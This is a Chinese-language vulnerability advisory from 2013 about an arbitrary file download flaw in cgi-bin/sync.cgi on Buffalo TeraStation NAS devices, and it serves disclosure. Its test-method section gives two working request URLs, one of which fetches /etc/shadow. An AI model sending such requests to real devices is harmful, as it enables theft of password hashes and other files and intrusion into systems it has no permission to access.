发布日期：2013-02-07
更新日期：2013-03-05

受影响系统：

Buffalo Technology TeraStation Network Attached Storage (NAS)TS-Serie 1.x

描述：

---

Buffalo TeraStation NAS是提供集中式存储和备份解决方案的一款软件。

当"gPage"设置为"information", "gMode"设置为"log", "gTyp"设置为"save"时，Buffalo TeraStation Network Attached Storage (NAS) TS-Series 1.57及其他版本使用了cgi-bin/sync.cgi内没有正确验证的"gKey"参数值，可被利用下载任意文件。

<*来源：Andrea Fabrizi （andrea.fabrizi@gmail.com）
  
  链接：http://secunia.com/advisories/52012/
        http://www.andreafabrizi.it/?exploits:terastation
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Andrea Fabrizi （andrea.fabrizi@gmail.com）提供了如下测试方法：

/cgi-bin/sync.cgi?gSSS=foo&gRRR=foo&gPage=information&gMode=log&gType=save&gKey=/etc/shadow

/cgi-bin/sync.cgi?gSSS=foo&gRRR=foo&gPage=information&gMode=log&gType=save&gKey=all

建议：

---

厂商补丁：

Buffalo Technology
------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.buffalotech.com

浏览次数：4694
严重程度：0（网友投票）